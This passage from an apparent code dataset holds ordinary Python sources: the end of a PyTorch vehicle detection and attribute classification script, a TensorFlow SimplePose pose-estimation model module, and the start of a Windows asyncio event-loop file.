torch.nn.Sequential(\r\n *list(self.features.children()))\r\n\r\n self.fc = torch.nn.Linear(512 ** 2, num_cls) # number of output classes\r\n # print('=> fc layer:\\n', self.fc)\r\n\r\n def forward(self, X):\r\n \"\"\"\r\n :param X:\r\n :return:\r\n \"\"\"\r\n N = X.size()[0]\r\n\r\n X = self.features(X) # extract features\r\n\r\n X = X.view(N, 512, 1 ** 2)\r\n X = torch.bmm(X, torch.transpose(X, 1, 2)) / (1 ** 2) # Bi-linear CNN\r\n\r\n X = X.view(N, 512 ** 2)\r\n X = torch.sqrt(X + 1e-5)\r\n X = torch.nn.functional.normalize(X)\r\n X = self.fc(X)\r\n assert X.size() == (N, self._num_cls)\r\n return X\r\n\r\n\r\n# ------------------------------------- vehicle multilabel classification model\r\nclass Car_Classifier(object):\r\n \"\"\"\r\n vehicle multilabel classification model manager\r\n \"\"\"\r\n\r\n def __init__(self,\r\n num_cls,\r\n model_path=local_model_path):\r\n \"\"\"\r\n load model and initialize\r\n \"\"\"\r\n\r\n # define model and load weights\r\n self.net = Cls_Net(num_cls=num_cls, input_size=224).to(device)\r\n # self.net = torch.nn.DataParallel(Net(num_cls=20, input_size=224),\r\n # device_ids=[0]).to(device)\r\n self.net.load_state_dict(torch.load(model_path))\r\n print('=> vehicle classifier loaded from %s' % model_path)\r\n\r\n # set model to eval mode\r\n self.net.eval()\r\n\r\n # test data transforms\r\n self.transforms = torchvision.transforms.Compose([\r\n torchvision.transforms.Resize(size=224),\r\n torchvision.transforms.CenterCrop(size=224),\r\n torchvision.transforms.ToTensor(),\r\n torchvision.transforms.Normalize(mean=(0.485, 0.456, 0.406),\r\n std=(0.229, 0.224, 0.225))\r\n ])\r\n\r\n # split each label\r\n self.color_attrs = color_attrs\r\n print('=> color_attrs:\\n', self.color_attrs)\r\n\r\n self.direction_attrs = direction_attrs\r\n print('=> direction attrs:\\n', self.direction_attrs)\r\n\r\n self.type_attrs = type_attrs\r\n print('=> type_attrs:\\n', self.type_attrs)\r\n\r\n def get_predict(self, output):\r\n \"\"\"\r\n get prediction from output\r\n \"\"\"\r\n # get each label's prediction from output\r\n output = output.cpu() # fetch data from gpu\r\n pred_color = output[:, :9]\r\n pred_direction = output[:, 9:11]\r\n pred_type = output[:, 11:]\r\n\r\n color_idx = pred_color.max(1, keepdim=True)[1]\r\n direction_idx = pred_direction.max(1, keepdim=True)[1]\r\n type_idx = pred_type.max(1, keepdim=True)[1]\r\n pred = 
torch.cat((color_idx, direction_idx, type_idx), dim=1)\r\n return pred\r\n\r\n def pre_process(self, image):\r\n \"\"\"\r\n image formatting\r\n :rtype: PIL.JpegImagePlugin.JpegImageFile\r\n \"\"\"\r\n # image data formatting\r\n if type(image) == np.ndarray:\r\n if image.shape[2] == 3: # turn all 3 channels to RGB format\r\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n elif image.shape[2] == 1: # turn 1 channel to RGB\r\n image = cv2.cvtColor(image, cv2.COLOR_GRAY2RGB)\r\n\r\n # turn numpy.ndarray into PIL.Image\r\n image = Image.fromarray(image)\r\n elif type(image) == PIL.JpegImagePlugin.JpegImageFile:\r\n if image.mode == 'L' or image.mode == 'I': # turn 8bits or 32bits into 3 channels RGB\r\n image = image.convert('RGB')\r\n\r\n return image\r\n\r\n def predict(self, img):\r\n \"\"\"\r\n predict vehicle attributes by classifying\r\n :return: vehicle color, direction and type \r\n \"\"\"\r\n # image pre-processing\r\n img = self.transforms(img)\r\n img = img.view(1, 3, 224, 224)\r\n\r\n # put image data into device\r\n img = img.to(device)\r\n\r\n # calculating inference\r\n output = self.net.forward(img)\r\n\r\n # get result\r\n # self.get_predict_ce, return pred to host side(cpu)\r\n pred = self.get_predict(output)\r\n color_name = self.color_attrs[pred[0][0]]\r\n direction_name = self.direction_attrs[pred[0][1]]\r\n type_name = self.type_attrs[pred[0][2]]\r\n\r\n return color_name, direction_name, type_name\r\n\r\n\r\nclass Car_DC():\r\n def __init__(self,\r\n src_dir,\r\n dst_dir,\r\n car_cfg_path=local_car_cfg_path,\r\n car_det_weights_path=local_car_det_weights_path,\r\n inp_dim=768,\r\n prob_th=0.2,\r\n nms_th=0.4,\r\n num_classes=1):\r\n \"\"\"\r\n model initialization\r\n \"\"\"\r\n # super parameters\r\n self.inp_dim = inp_dim\r\n self.prob_th = prob_th\r\n self.nms_th = nms_th\r\n self.num_classes = num_classes\r\n self.dst_dir = dst_dir\r\n\r\n # clear dst_dir\r\n if os.path.exists(self.dst_dir):\r\n for x in os.listdir(self.dst_dir):\r\n if x.endswith('.jpg'):\r\n os.remove(self.dst_dir + '/' + x)\r\n else:\r\n os.makedirs(self.dst_dir)\r\n\r\n # initialize vehicle detection model\r\n self.detector = Darknet(car_cfg_path)\r\n self.detector.load_weights(car_det_weights_path)\r\n # set input dimension of image\r\n self.detector.net_info['height'] = self.inp_dim\r\n self.detector.to(device)\r\n self.detector.eval() # evaluation mode\r\n print('=> car detection model initiated.')\r\n\r\n # initiate multilabel classifier\r\n self.classifier = Car_Classifier(num_cls=19,\r\n model_path=local_model_path)\r\n\r\n # initiate imgs_path\r\n self.imgs_path = [os.path.join(src_dir, x) for x in os.listdir(\r\n src_dir) if x.endswith('.jpg')]\r\n\r\n def cls_draw_bbox(self, output, orig_img):\r\n \"\"\"\r\n 1. predict vehicle's attributes based on bbox of vehicle\r\n 2. 
draw bbox to orig_img\r\n \"\"\"\r\n labels = []\r\n pt_1s = []\r\n pt_2s = []\r\n\r\n # 1\r\n for det in output:\r\n # rectangle points\r\n pt_1 = tuple(det[1:3].int()) # the left-up point\r\n pt_2 = tuple(det[3:5].int()) # the right down point\r\n pt_1s.append(pt_1)\r\n pt_2s.append(pt_2)\r\n\r\n # turn BGR back to RGB\r\n ROI = Image.fromarray(\r\n orig_img[pt_1[1]: pt_2[1],\r\n pt_1[0]: pt_2[0]][:, :, ::-1])\r\n # ROI.show()\r\n\r\n # call classifier to predict\r\n car_color, car_direction, car_type = self.classifier.predict(ROI)\r\n label = str(car_color + ' ' + car_direction + ' ' + car_type)\r\n labels.append(label)\r\n print('=> predicted label: ', label)\r\n\r\n # 2\r\n color = (0, 215, 255)\r\n for i, det in enumerate(output):\r\n pt_1 = pt_1s[i]\r\n pt_2 = pt_2s[i]\r\n\r\n # draw bounding box\r\n cv2.rectangle(orig_img, pt_1, pt_2, color, thickness=2)\r\n\r\n # get str text size\r\n txt_size = cv2.getTextSize(\r\n label, cv2.FONT_HERSHEY_PLAIN, 2, 2)[0]\r\n # pt_2 = pt_1[0] + txt_size[0] + 3, pt_1[1] + txt_size[1] + 5\r\n pt_2 = pt_1[0] + txt_size[0] + 3, pt_1[1] - txt_size[1] - 5\r\n\r\n # draw text background rect\r\n cv2.rectangle(orig_img, pt_1, pt_2, color, thickness=-1) # text\r\n\r\n # draw text\r\n cv2.putText(orig_img, labels[i], (pt_1[0], pt_1[1]), # pt_1[1] + txt_size[1] + 4\r\n cv2.FONT_HERSHEY_PLAIN, 2, [225, 255, 255], 2)\r\n\r\n def process_predict(self,\r\n prediction,\r\n prob_th,\r\n num_cls,\r\n nms_th,\r\n inp_dim,\r\n orig_img_size):\r\n \"\"\"\r\n processing detections\r\n \"\"\"\r\n scaling_factor = min([inp_dim / float(x)\r\n for x in orig_img_size]) # W, H scaling factor\r\n output = post_process(prediction,\r\n prob_th,\r\n num_cls,\r\n nms=True,\r\n nms_conf=nms_th,\r\n CUDA=True) # post-process such as nms\r\n\r\n if type(output) != int:\r\n output[:, [1, 3]] -= (inp_dim - scaling_factor *\r\n orig_img_size[0]) / 2.0 # x, w\r\n output[:, [2, 4]] -= (inp_dim - scaling_factor *\r\n orig_img_size[1]) / 2.0 # y, h\r\n output[:, 1:5] /= scaling_factor\r\n for i in range(output.shape[0]):\r\n output[i, [1, 3]] = torch.clamp(\r\n output[i, [1, 3]], 0.0, orig_img_size[0])\r\n output[i, [2, 4]] = torch.clamp(\r\n output[i, [2, 4]], 0.0, orig_img_size[1])\r\n return output\r\n\r\n def detect_classify(self):\r\n \"\"\"\r\n detect and classify\r\n \"\"\"\r\n for x in self.imgs_path:\r\n # read image data\r\n img = Image.open(x)\r\n img2det = process_img(img, self.inp_dim)\r\n img2det = img2det.to(device) # put image data to device\r\n\r\n # vehicle detection\r\n prediction = self.detector.forward(img2det, CUDA=True)\r\n\r\n # calculating scaling factor\r\n orig_img_size = list(img.size)\r\n output = self.process_predict(prediction,\r\n self.prob_th,\r\n self.num_classes,\r\n self.nms_th,\r\n self.inp_dim,\r\n orig_img_size)\r\n\r\n orig_img = cv2.cvtColor(np.asarray(\r\n img), cv2.COLOR_RGB2BGR) # RGB => BGR\r\n if type(output) != int:\r\n self.cls_draw_bbox(output, orig_img)\r\n dst_path = self.dst_dir + '/' + os.path.split(x)[1]\r\n if not os.path.exists(dst_path):\r\n cv2.imwrite(dst_path, orig_img)\r\n\r\n# -----------------------------------------------------------\r\n\r\n\r\nparser = argparse.ArgumentParser(description='Detect and classify cars.')\r\nparser.add_argument('-src-dir',\r\n type=str,\r\n default='./test_imgs',\r\n help='source directory of images')\r\nparser.add_argument('-dst-dir',\r\n type=str,\r\n default='./test_result',\r\n help='destination directory of images to store results.')\r\n\r\nif __name__ == '__main__':\r\n # 
---------------------------- Car detect and classify\r\n # DR_model = Car_DC(src_dir='./test_imgs',\r\n # dst_dir='./test_result')\r\n # DR_model.detect_classify()\r\n\r\n args = parser.parse_args()\r\n DR_model = Car_DC(src_dir=args.src_dir, dst_dir=args.dst_dir)\r\n DR_model.detect_classify()\r\n"} {"ext": "py", "sha": "1a311287858742e4089ce0d0057dc5ae29d8da25", "content": "\"\"\"\n SimplePose for COCO Keypoint, implemented in TensorFlow.\n Original paper: 'Simple Baselines for Human Pose Estimation and Tracking,' https://arxiv.org/abs/1804.06208.\n\"\"\"\n\n__all__ = ['SimplePose', 'simplepose_resnet18_coco', 'simplepose_resnet50b_coco', 'simplepose_resnet101b_coco',\n 'simplepose_resnet152b_coco', 'simplepose_resneta50b_coco', 'simplepose_resneta101b_coco',\n 'simplepose_resneta152b_coco']\n\nimport os\nimport tensorflow as tf\ntf.random.set_seed(3)\nimport tensorflow.keras.layers as nn\nfrom .common import get_activation_layer, BatchNorm, conv1x1, HeatmapMaxDetBlock, is_channels_first\nfrom .resnet import resnet18, resnet50b, resnet101b, resnet152b\nfrom .resneta import resneta50b, resneta101b, resneta152b\n\n\nclass Deconv2d(nn.Layer):\n \"\"\"\n Standard deconvolution layer.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n out_channels : int\n Number of output channels.\n kernel_size : int or tuple/list of 2 int\n Convolution window size.\n strides : int or tuple/list of 2 int, default 1\n Strides of the convolution.\n padding : int or tuple/list of 2 int, default 0\n Padding value for convolution layer.\n out_padding : int or tuple/list of 2 int, default 0\n Output padding value for deconvolution layer.\n dilation : int or tuple/list of 2 int, default 1\n Dilation value for convolution layer.\n groups : int, default 1\n Number of groups.\n use_bias : bool, default True\n Whether the layer uses a bias vector.\n data_format : str, default 'channels_last'\n The ordering of the dimensions in tensors.\n \"\"\"\n def __init__(self,\n in_channels,\n out_channels,\n kernel_size,\n strides=1,\n padding=0,\n out_padding=0,\n dilation=1,\n groups=1,\n use_bias=True,\n data_format=\"channels_last\",\n **kwargs):\n super(Deconv2d, self).__init__(**kwargs)\n assert (dilation == 1)\n assert (groups == 1)\n assert (in_channels is not None)\n\n if isinstance(padding, int):\n padding = (padding, padding)\n\n self.use_crop = (padding[0] > 0) or (padding[1] > 0)\n if self.use_crop:\n self.crop = nn.Cropping2D(\n cropping=padding,\n data_format=data_format,\n name=\"crop\")\n\n self.conv = nn.Conv2DTranspose(\n filters=out_channels,\n kernel_size=kernel_size,\n strides=strides,\n padding=\"valid\",\n output_padding=out_padding,\n data_format=data_format,\n dilation_rate=dilation,\n use_bias=use_bias,\n name=\"conv\")\n\n def call(self, x):\n x = self.conv(x)\n if self.use_crop:\n x = self.crop(x)\n return x\n\n\nclass DeconvBlock(nn.Layer):\n \"\"\"\n Deconvolution block with batch normalization and activation.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n out_channels : int\n Number of output channels.\n kernel_size : int or tuple/list of 2 int\n Convolution window size.\n strides : int or tuple/list of 2 int\n Strides of the deconvolution.\n padding : int or tuple/list of 2 int\n Padding value for deconvolution layer.\n out_padding : int or tuple/list of 2 int, default 0\n Output padding value for deconvolution layer.\n dilation : int or tuple/list of 2 int, default 1\n Dilation value for deconvolution layer.\n groups : int, default 1\n 
Number of groups.\n use_bias : bool, default False\n Whether the layer uses a bias vector.\n use_bn : bool, default True\n Whether to use BatchNorm layer.\n bn_eps : float, default 1e-5\n Small float added to variance in Batch norm.\n activation : function or str or None, default 'relu'\n Activation function or name of activation function.\n data_format : str, default 'channels_last'\n The ordering of the dimensions in tensors.\n \"\"\"\n def __init__(self,\n in_channels,\n out_channels,\n kernel_size,\n strides,\n padding,\n out_padding=0,\n dilation=1,\n groups=1,\n use_bias=False,\n use_bn=True,\n bn_eps=1e-5,\n activation=\"relu\",\n data_format=\"channels_last\",\n **kwargs):\n super(DeconvBlock, self).__init__(**kwargs)\n assert (in_channels is not None)\n self.activate = (activation is not None)\n self.use_bn = use_bn\n\n self.conv = Deconv2d(\n in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=kernel_size,\n strides=strides,\n padding=padding,\n out_padding=out_padding,\n dilation=dilation,\n groups=groups,\n use_bias=use_bias,\n data_format=data_format,\n name=\"conv\")\n if self.use_bn:\n self.bn = BatchNorm(\n epsilon=bn_eps,\n data_format=data_format,\n name=\"bn\")\n if self.activate:\n self.activ = get_activation_layer(activation)\n\n def call(self, x, training=None):\n x = self.conv(x)\n if self.use_bn:\n x = self.bn(x, training=training)\n if self.activate:\n x = self.activ(x)\n return x\n\n\nclass SimplePose(tf.keras.Model):\n \"\"\"\n SimplePose model from 'Simple Baselines for Human Pose Estimation and Tracking,' https://arxiv.org/abs/1804.06208.\n\n Parameters:\n ----------\n backbone : nn.Sequential\n Feature extractor.\n backbone_out_channels : int\n Number of output channels for the backbone.\n channels : list of int\n Number of output channels for each decoder unit.\n return_heatmap : bool, default False\n Whether to return only heatmap.\n in_channels : int, default 3\n Number of input channels.\n in_size : tuple of two ints, default (256, 192)\n Spatial size of the expected input image.\n keypoints : int, default 17\n Number of keypoints.\n data_format : str, default 'channels_last'\n The ordering of the dimensions in tensors.\n \"\"\"\n def __init__(self,\n backbone,\n backbone_out_channels,\n channels,\n return_heatmap=False,\n in_channels=3,\n in_size=(256, 192),\n keypoints=17,\n data_format=\"channels_last\",\n **kwargs):\n super(SimplePose, self).__init__(**kwargs)\n assert (in_channels == 3)\n self.in_size = in_size\n self.keypoints = keypoints\n self.return_heatmap = return_heatmap\n self.data_format = data_format\n\n self.backbone = backbone\n self.backbone._name = \"backbone\"\n\n self.decoder = tf.keras.Sequential(name=\"decoder\")\n in_channels = backbone_out_channels\n for i, out_channels in enumerate(channels):\n self.decoder.add(DeconvBlock(\n in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=4,\n strides=2,\n padding=1,\n data_format=data_format,\n name=\"unit{}\".format(i + 1)))\n in_channels = out_channels\n self.decoder.add(conv1x1(\n in_channels=in_channels,\n out_channels=keypoints,\n use_bias=True,\n data_format=data_format,\n name=\"final_block\"))\n\n self.heatmap_max_det = HeatmapMaxDetBlock(\n data_format=data_format,\n name=\"heatmap_max_det\")\n\n def call(self, x, training=None):\n x = self.backbone(x, training=training)\n heatmap = self.decoder(x, training=training)\n if self.return_heatmap or not tf.executing_eagerly():\n return [heatmap]\n else:\n keypoints = self.heatmap_max_det(heatmap)\n return 
keypoints\n\n\ndef get_simplepose(backbone,\n backbone_out_channels,\n keypoints,\n model_name=None,\n data_format=\"channels_last\",\n pretrained=False,\n root=os.path.join(\"~\", \".tensorflow\", \"models\"),\n channels=[256, 256, 256],\n **kwargs):\n \"\"\"\n Create SimplePose model with specific parameters.\n\n Parameters:\n ----------\n backbone : nn.Sequential\n Feature extractor.\n backbone_out_channels : int\n Number of output channels for the backbone.\n keypoints : int\n Number of keypoints.\n model_name : str or None, default None\n Model name for loading pretrained model.\n data_format : str, default 'channels_last'\n The ordering of the dimensions in tensors.\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n root : str, default '~/.tensorflow/models'\n Location for keeping the model parameters.\n \"\"\"\n\n net = SimplePose(\n backbone=backbone,\n backbone_out_channels=backbone_out_channels,\n channels=channels,\n keypoints=keypoints,\n data_format=data_format,\n **kwargs)\n\n if pretrained:\n if (model_name is None) or (not model_name):\n raise ValueError(\"Parameter `model_name` should be properly initialized for loading pretrained model.\")\n from .model_store import get_model_file\n in_channels = kwargs[\"in_channels\"] if (\"in_channels\" in kwargs) else 3\n input_shape = (1,) + (in_channels,) + net.in_size if net.data_format == \"channels_first\" else\\\n (1,) + net.in_size + (in_channels,)\n net.build(input_shape=input_shape)\n net.load_weights(\n filepath=get_model_file(\n model_name=model_name,\n local_model_store_dir_path=root))\n\n return net\n\n\ndef simplepose_mobilenetv2_coco(mv2_alpha=1.0, keypoints=17, data_format=\"channels_last\", **kwargs):\n backbone = tf.keras.applications.MobileNetV2(include_top=False, alpha=mv2_alpha)\n return get_simplepose(backbone, backbone_out_channels=512, keypoints=keypoints,\n model_name=\"simplepose_mobilenetv2_coco\", data_format=data_format, **kwargs)\n\n\ndef simplepose_mv2_coco(keypoints=17, data_format=\"channels_last\", **kwargs):\n from .mv2_cpm import MobileNetV2\n backbone = MobileNetV2()\n return get_simplepose(backbone, backbone_out_channels=256, keypoints=keypoints,\n model_name=\"simplepose_mv2_coco\", data_format=data_format, channels=[256, 256], **kwargs)\n\n\ndef simplepose_resnet18_coco(pretrained_backbone=False, keypoints=17, data_format=\"channels_last\", **kwargs):\n \"\"\"\n SimplePose model on the base of ResNet-18 for COCO Keypoint from 'Simple Baselines for Human Pose Estimation and\n Tracking,' https://arxiv.org/abs/1804.06208.\n\n Parameters:\n ----------\n pretrained_backbone : bool, default False\n Whether to load the pretrained weights for feature extractor.\n keypoints : int, default 17\n Number of keypoints.\n data_format : str, default 'channels_last'\n The ordering of the dimensions in tensors.\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n root : str, default '~/.tensorflow/models'\n Location for keeping the model parameters.\n \"\"\"\n backbone = resnet18(pretrained=pretrained_backbone, data_format=data_format).features\n backbone._layers.pop()\n return get_simplepose(backbone=backbone, backbone_out_channels=512, keypoints=keypoints,\n model_name=\"simplepose_resnet18_coco\", data_format=data_format, **kwargs)\n\n\ndef simplepose_resnet50b_coco(pretrained_backbone=False, keypoints=17, data_format=\"channels_last\", **kwargs):\n \"\"\"\n SimplePose model on the base of ResNet-50b for COCO Keypoint from 'Simple 
Baselines for Human Pose Estimation and\n Tracking,' https://arxiv.org/abs/1804.06208.\n\n Parameters:\n ----------\n pretrained_backbone : bool, default False\n Whether to load the pretrained weights for feature extractor.\n keypoints : int, default 17\n Number of keypoints.\n data_format : str, default 'channels_last'\n The ordering of the dimensions in tensors.\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n root : str, default '~/.tensorflow/models'\n Location for keeping the model parameters.\n \"\"\"\n backbone = resnet50b(pretrained=pretrained_backbone, data_format=data_format).features\n backbone._layers.pop()\n return get_simplepose(backbone=backbone, backbone_out_channels=2048, keypoints=keypoints,\n model_name=\"simplepose_resnet50b_coco\", data_format=data_format, **kwargs)\n\n\ndef simplepose_resnet101b_coco(pretrained_backbone=False, keypoints=17, data_format=\"channels_last\", **kwargs):\n \"\"\"\n SimplePose model on the base of ResNet-101b for COCO Keypoint from 'Simple Baselines for Human Pose Estimation\n and Tracking,' https://arxiv.org/abs/1804.06208.\n\n Parameters:\n ----------\n pretrained_backbone : bool, default False\n Whether to load the pretrained weights for feature extractor.\n keypoints : int, default 17\n Number of keypoints.\n data_format : str, default 'channels_last'\n The ordering of the dimensions in tensors.\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n root : str, default '~/.tensorflow/models'\n Location for keeping the model parameters.\n \"\"\"\n backbone = resnet101b(pretrained=pretrained_backbone, data_format=data_format).features\n backbone._layers.pop()\n return get_simplepose(backbone=backbone, backbone_out_channels=2048, keypoints=keypoints,\n model_name=\"simplepose_resnet101b_coco\", data_format=data_format, **kwargs)\n\n\ndef simplepose_resnet152b_coco(pretrained_backbone=False, keypoints=17, data_format=\"channels_last\", **kwargs):\n \"\"\"\n SimplePose model on the base of ResNet-152b for COCO Keypoint from 'Simple Baselines for Human Pose Estimation\n and Tracking,' https://arxiv.org/abs/1804.06208.\n\n Parameters:\n ----------\n pretrained_backbone : bool, default False\n Whether to load the pretrained weights for feature extractor.\n keypoints : int, default 17\n Number of keypoints.\n data_format : str, default 'channels_last'\n The ordering of the dimensions in tensors.\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n root : str, default '~/.tensorflow/models'\n Location for keeping the model parameters.\n \"\"\"\n backbone = resnet152b(pretrained=pretrained_backbone, data_format=data_format).features\n backbone._layers.pop()\n return get_simplepose(backbone=backbone, backbone_out_channels=2048, keypoints=keypoints,\n model_name=\"simplepose_resnet152b_coco\", data_format=data_format, **kwargs)\n\n\ndef simplepose_resneta50b_coco(pretrained_backbone=False, keypoints=17, data_format=\"channels_last\", **kwargs):\n \"\"\"\n SimplePose model on the base of ResNet(A)-50b for COCO Keypoint from 'Simple Baselines for Human Pose Estimation\n and Tracking,' https://arxiv.org/abs/1804.06208.\n\n Parameters:\n ----------\n pretrained_backbone : bool, default False\n Whether to load the pretrained weights for feature extractor.\n keypoints : int, default 17\n Number of keypoints.\n data_format : str, default 'channels_last'\n The ordering of the dimensions in tensors.\n pretrained : bool, default False\n Whether to load 
the pretrained weights for model.\n root : str, default '~/.tensorflow/models'\n Location for keeping the model parameters.\n \"\"\"\n backbone = resneta50b(pretrained=pretrained_backbone, data_format=data_format).features\n backbone._layers.pop()\n return get_simplepose(backbone=backbone, backbone_out_channels=2048, keypoints=keypoints,\n model_name=\"simplepose_resneta50b_coco\", data_format=data_format, **kwargs)\n\n\ndef simplepose_resneta101b_coco(pretrained_backbone=False, keypoints=17, data_format=\"channels_last\", **kwargs):\n \"\"\"\n SimplePose model on the base of ResNet(A)-101b for COCO Keypoint from 'Simple Baselines for Human Pose Estimation\n and Tracking,' https://arxiv.org/abs/1804.06208.\n\n Parameters:\n ----------\n pretrained_backbone : bool, default False\n Whether to load the pretrained weights for feature extractor.\n keypoints : int, default 17\n Number of keypoints.\n data_format : str, default 'channels_last'\n The ordering of the dimensions in tensors.\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n root : str, default '~/.tensorflow/models'\n Location for keeping the model parameters.\n \"\"\"\n backbone = resneta101b(pretrained=pretrained_backbone, data_format=data_format).features\n backbone._layers.pop()\n return get_simplepose(backbone=backbone, backbone_out_channels=2048, keypoints=keypoints,\n model_name=\"simplepose_resneta101b_coco\", data_format=data_format, **kwargs)\n\n\ndef simplepose_resneta152b_coco(pretrained_backbone=False, keypoints=17, data_format=\"channels_last\", **kwargs):\n \"\"\"\n SimplePose model on the base of ResNet(A)-152b for COCO Keypoint from 'Simple Baselines for Human Pose Estimation\n and Tracking,' https://arxiv.org/abs/1804.06208.\n\n Parameters:\n ----------\n pretrained_backbone : bool, default False\n Whether to load the pretrained weights for feature extractor.\n keypoints : int, default 17\n Number of keypoints.\n data_format : str, default 'channels_last'\n The ordering of the dimensions in tensors.\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n root : str, default '~/.tensorflow/models'\n Location for keeping the model parameters.\n \"\"\"\n backbone = resneta152b(pretrained=pretrained_backbone, data_format=data_format).features\n backbone._layers.pop()\n return get_simplepose(backbone=backbone, backbone_out_channels=2048, keypoints=keypoints,\n model_name=\"simplepose_resneta152b_coco\", data_format=data_format, **kwargs)\n\n\ndef _test():\n import numpy as np\n import tensorflow.keras.backend as K\n\n data_format = \"channels_last\"\n # data_format = \"channels_first\"\n in_size = (256, 192)\n keypoints = 17\n return_heatmap = False\n pretrained = False\n\n models = [\n simplepose_resnet18_coco,\n simplepose_resnet50b_coco,\n simplepose_resnet101b_coco,\n simplepose_resnet152b_coco,\n simplepose_resneta50b_coco,\n simplepose_resneta101b_coco,\n simplepose_resneta152b_coco,\n ]\n\n for model in models:\n\n net = model(pretrained=pretrained, in_size=in_size, return_heatmap=return_heatmap, data_format=data_format)\n\n batch = 14\n x = tf.random.normal((batch, 3, in_size[0], in_size[1]) if is_channels_first(data_format) else\n (batch, in_size[0], in_size[1], 3))\n y = net(x)\n assert (y.shape[0] == batch)\n if return_heatmap:\n if is_channels_first(data_format):\n assert ((y.shape[1] == keypoints) and (y.shape[2] == x.shape[2] // 4) and\n (y.shape[3] == x.shape[3] // 4))\n else:\n assert ((y.shape[3] == keypoints) and (y.shape[1] == 
x.shape[1] // 4) and\n (y.shape[2] == x.shape[2] // 4))\n else:\n assert ((y.shape[1] == keypoints) and (y.shape[2] == 3))\n\n weight_count = sum([np.prod(K.get_value(w).shape) for w in net.trainable_weights])\n print(\"m={}, {}\".format(model.__name__, weight_count))\n assert (model != simplepose_resnet18_coco or weight_count == 15376721)\n assert (model != simplepose_resnet50b_coco or weight_count == 33999697)\n assert (model != simplepose_resnet101b_coco or weight_count == 52991825)\n assert (model != simplepose_resnet152b_coco or weight_count == 68635473)\n assert (model != simplepose_resneta50b_coco or weight_count == 34018929)\n assert (model != simplepose_resneta101b_coco or weight_count == 53011057)\n assert (model != simplepose_resneta152b_coco or weight_count == 68654705)\n\n\nif __name__ == \"__main__\":\n _test()\n"} {"ext": "py", "sha": "1a311573372ab9525196d1108623bb785e20284c", "content": "\"\"\"Selector and proactor event loops for Windows.\"\"\"\r\n\r\nimport _overlapped\r\nimport _winapi\r\nimport errno\r\nimport math\r\nimport msvcrt\r\nimport socket\r\nimport struct\r\nimport time\r\nimport weakref\r\n\r\nfrom . import events\r\nfrom . import base_subprocess\r\nfrom . import futures\r\nfrom . import exceptions\r\nfrom . import proactor_events\r\nfrom . import selector_events\r\nfrom . import tasks\r\nfrom . import windows_utils\r\nfrom .log import logger\r\n\r\n\r\n__all__ = (\r\n 'SelectorEventLoop', 'ProactorEventLoop', 'IocpProactor',\r\n 'DefaultEventLoopPolicy', 'WindowsSelectorEventLoopPolicy',\r\n 'WindowsProactorEventLoopPolicy',\r\n)\r\n\r\n\r\nNULL = 0\r\nINFINITE = 0xffffffff\r\nERROR_CONNECTION_REFUSED = 1225\r\nERROR_CONNECTION_ABORTED = 1236\r\n\r\n# Initial delay in seconds for connect_pipe() before retrying to connect\r\nCONNECT_PIPE_INIT_DELAY = 0.001\r\n\r\n# Maximum delay in seconds for connect_pipe() before retrying to connect\r\nCONNECT_PIPE_MAX_DELAY = 0.100\r\n\r\n\r\nclass _OverlappedFuture(futures.Future):\r\n \"\"\"Subclass of Future which represents an overlapped operation.\r\n\r\n Cancelling it will immediately cancel the overlapped operation.\r\n \"\"\"\r\n\r\n def __init__(self, ov, *, loop=None):\r\n super().__init__(loop=loop)\r\n if self._source_traceback:\r\n del self._source_traceback[-1]\r\n self._ov = ov\r\n\r\n def _repr_info(self):\r\n info = super()._repr_info()\r\n if self._ov is not None:\r\n state = 'pending' if self._ov.pending else 'completed'\r\n info.insert(1, f'overlapped=<{state}, {self._ov.address:#x}>')\r\n return info\r\n\r\n def _cancel_overlapped(self):\r\n if self._ov is None:\r\n return\r\n try:\r\n self._ov.cancel()\r\n except OSError as exc:\r\n context = {\r\n 'message': 'Cancelling an overlapped future failed',\r\n 'exception': exc,\r\n 'future': self,\r\n }\r\n if self._source_traceback:\r\n context['source_traceback'] = self._source_traceback\r\n self._loop.call_exception_handler(context)\r\n self._ov = None\r\n\r\n def cancel(self, msg=None):\r\n self._cancel_overlapped()\r\n return super().cancel(msg=msg)\r\n\r\n def set_exception(self, exception):\r\n super().set_exception(exception)\r\n self._cancel_overlapped()\r\n\r\n def set_result(self, result):\r\n super().set_result(result)\r\n self._ov = None\r\n\r\n\r\nclass _BaseWaitHandleFuture(futures.Future):\r\n \"\"\"Subclass of Future which represents a wait handle.\"\"\"\r\n\r\n def __init__(self, ov, handle, wait_handle, *, loop=None):\r\n super().__init__(loop=loop)\r\n if self._source_traceback:\r\n del self._source_traceback[-1]\r\n # Keep a reference 
to the Overlapped object to keep it alive until the\r\n # wait is unregistered\r\n self._ov = ov\r\n self._handle = handle\r\n self._wait_handle = wait_handle\r\n\r\n # Should we call UnregisterWaitEx() if the wait completes\r\n # or is cancelled?\r\n self._registered = True\r\n\r\n def _poll(self):\r\n # non-blocking wait: use a timeout of 0 millisecond\r\n return (_winapi.WaitForSingleObject(self._handle, 0) ==\r\n _winapi.WAIT_OBJECT_0)\r\n\r\n def _repr_info(self):\r\n info = super()._repr_info()\r\n info.append(f'handle={self._handle:#x}')\r\n if self._handle is not None:\r\n state = 'signaled' if self._poll() else 'waiting'\r\n info.append(state)\r\n if self._wait_handle is not None:\r\n info.append(f'wait_handle={self._wait_handle:#x}')\r\n return info\r\n\r\n def _unregister_wait_cb(self, fut):\r\n # The wait was unregistered: it's not safe to destroy the Overlapped\r\n # object\r\n self._ov = None\r\n\r\n def _unregister_wait(self):\r\n if not self._registered:\r\n return\r\n self._registered = False\r\n\r\n wait_handle = self._wait_handle\r\n self._wait_handle = None\r\n try:\r\n _overlapped.UnregisterWait(wait_handle)\r\n except OSError as exc:\r\n if exc.winerror != _overlapped.ERROR_IO_PENDING:\r\n context = {\r\n 'message': 'Failed to unregister the wait handle',\r\n 'exception': exc,\r\n 'future': self,\r\n }\r\n if self._source_traceback:\r\n context['source_traceback'] = self._source_traceback\r\n self._loop.call_exception_handler(context)\r\n return\r\n # 